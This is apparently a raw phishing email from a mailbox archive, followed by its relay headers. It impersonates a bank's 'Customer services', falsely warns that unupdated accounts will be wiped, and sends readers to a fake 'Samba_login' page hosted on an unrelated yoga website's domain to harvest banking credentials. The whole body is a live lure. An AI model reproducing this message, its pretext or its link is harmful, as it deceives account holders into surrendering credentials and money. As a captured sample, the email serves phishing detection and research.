From: Samba <petefi@gimelnet.rs>
Message-ID: <1525653242.112722.1459335921833.JavaMail.zimbra@gimelnet.rs>
Subject: Dear valued customer
MIME-Version: 1.0
Content-Type: text/plain; charset=utf-8
Content-Transfer-Encoding: quoted-printable
X-Originating-IP: [94.79.77.1]
X-Mailer: Zimbra 8.6.0_GA_1153 (zclient/8.6.0_GA_1153)
Thread-Topic: Dear valued customer
Thread-Index: 6YGlsB2JGLpqLGy0YMyvpsYWPLgVdQ==
Status: O
X-Status: 
X-Keywords:                  
X-UID: 142

Dear valued customer,

Due to recent security threats on our customer=E2=80=99s accounts, there ha=
s been a recent update of our banking software for better security on custo=
mer accounts. The new software will wipe out accounts that have not been up=
dated. To keep your account from expiring and closing we kindly ask that yo=
u take out a few minutes of your time to complete the update and secure you=
r account. Please click the link below for the update

http://balancedyoga.com.au/samba/public_html/Samba_login-en.html

After completion of the update online a customer representative will call y=
ou for security reasons if your update is incomplete or was not completed c=
orrectly. We thank you for your continued loyalty to our bank and your coop=
eration.
Yours Faithfully,
Customer services

From jose@monkey.org Wed Mar 30 15:27:45 2016 +0000
Return-Path: petefi@gimelnet.rs
Delivered-To: jose@monkey.org
X-FDA: 71350731690.11.drug14_60c42e57c0545
X-Spam-Summary: 10,1,0,6410b78d97f5482a,d41d8cd98f00b204,petefi@gimelnet.rs,,RULES_HIT:10:41:46:150:152:355:379:387:541:582:967:988:989:1152:1260:1261:1263:1277:1311:1313:1314:1345:1373:1381:1513:1515:1516:1518:1521:1535:1541:1593:1594:1711:1730:1747:1777:1792:1801:2393:2525:2560:2563:2682:2685:2827:2859:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3352:3876:3877:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4605:5007:6114:6117:6261:6642:8960:8985:9025:9149:9388:10004:10030:10400:11320:11638:11639:11658:11783:11914:11984:12043:12682:12776:13069:13311:13357:14094:14181:14721:30056,0,RBL:185.26.172.7:@gimelnet.rs:.lbl8.mailshell.net-62.2.255.100 64.100.201.201,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fp,MSBL:0,DNSBL:neutral,Custom_rules:0:0:0,LFtime:12,LUA_SUMMARY:none
X-HE-Tag: drug14_60c42e57c0545
X-Filterd-Recvd-Size: 5525
Received: from mail.gimelnet.rs (mail.gimelnet.rs [185.26.172.7])
	by imf06.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Wed, 30 Mar 2016 15:27:44 +0000 (UTC)
Received: from localhost (localhost.localdomain [127.0.0.1])
	by mail.gimelnet.rs (Postfix) with ESMTP id 00FFD527B91;
	Wed, 30 Mar 2016 17:14:22 +0200 (CEST)
Received: from mail.gimelnet.rs ([127.0.0.1])
	by localhost (mail.gimelnet.rs [127.0.0.1]) (amavisd-new, port 10032)
	with ESMTP id D1HQzZsenH4k; Wed, 30 Mar 2016 17:14:22 +0200 (CEST)
Received: from localhost (localhost.localdomain [127.0.0.1])
	by mail.gimelnet.rs (Postfix) with ESMTP id 64603527BA7;
	Wed, 30 Mar 2016 17:14:20 +0200 (CEST)
X-Virus-Scanned: amavisd-new at gimelnet.rs
Received: from mail.gimelnet.rs ([127.0.0.1])
	by localhost (mail.gimelnet.rs [127.0.0.1]) (amavisd-new, port 10026)
	with ESMTP id TPdUkUEb0w3A; Wed, 30 Mar 2016 17:14:19 +0200 (CEST)
Received: from mail.gimelnet.rs (mail.gimelnet.rs [185.26.172.7])
	by mail.gimelnet.rs (Postfix) with ESMTP id C61B1527B66;
	Wed, 30 Mar 2016 17:14:17 +0200 (CEST)
Date: Wed, 30 Mar 2016 17:14:17 +0200 (CEST)
